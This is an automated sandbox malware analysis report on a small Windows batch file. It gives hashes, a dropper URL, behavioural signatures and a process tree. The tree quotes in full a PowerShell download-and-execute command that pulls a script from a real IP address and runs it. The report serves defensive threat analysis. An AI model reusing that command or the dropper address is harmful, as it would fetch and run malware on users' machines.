Analysis
- max time kernel: 147s
- max time network: 92s
- platform: windows10_x64
- resource: win10v200430
- submitted: 12-07-2020 19:10
Static task: static1
Behavioral task: behavioral1
- Sample: d8b4df362b6cf1bf526634ea889b42de.bat
- Resource: win7 (windows7_x64)
- 0 signatures
- 0 seconds
Behavioral task: behavioral2
- Sample: d8b4df362b6cf1bf526634ea889b42de.bat
- Resource: win10v200430 (windows10_x64)
- 0 signatures
- 0 seconds
General
- Target: d8b4df362b6cf1bf526634ea889b42de.bat
- Size: 213B
- MD5: fa5f98db7255446f6688e03c1b8639e1
- SHA1: 9149b6cdcab524d9e06254b52dcdcb0455cdb7ac
- SHA256: b64c3249144683345453feac5f2c3ed3374d33a8eaf6bf4e30299e55a1bf1fca
- SHA512: e13b67fd455c2e28362529b6cc986135be45d21ad68a8a7b7af6203b4766dce4fe74bd1f8fc16f7de6b09f1b9a787982d4302b2aa26c48c5a6326503b6d3d4a8
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: URLs
- ps1.dropper: http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de
Signatures
- Suspicious behavior: EnumeratesProcesses (13 IoCs)
  Processes:
  pid   process
  816   WerFault.exe   (13 identical entries)
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
  description                         pid    process    target process
  PID 3768 wrote to memory of 2932    3768   cmd.exe    powershell.exe   (3 identical entries)
- Program crash (1 IoC)
  Processes:
  pid   pid_target   process        target process
  816   2932         WerFault.exe   powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  description                  pid   process
  Token: SeRestorePrivilege    816   WerFault.exe
  Token: SeBackupPrivilege     816   WerFault.exe
  Token: SeDebugPrivilege      816   WerFault.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d8b4df362b6cf1bf526634ea889b42de.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de');Invoke-CFAKWL;Start-Sleep -s 10000"
    - C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 704
      - Suspicious behavior: EnumeratesProcesses
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads
- memory/816-1-0x0000000004DA0000-0x0000000004DA1000-memory.dmp (Filesize: 4KB)
- memory/816-9-0x00000000053D0000-0x00000000053D1000-memory.dmp (Filesize: 4KB)
- memory/2932-0-0x0000000000000000-mapping.dmp
- memory/2932-2-0x0000000000000000-mapping.dmp
- memory/2932-3-0x0000000000000000-mapping.dmp
- memory/2932-4-0x0000000000000000-mapping.dmp
- memory/2932-5-0x0000000000000000-mapping.dmp
- memory/2932-6-0x0000000000000000-mapping.dmp
- memory/2932-7-0x0000000000000000-mapping.dmp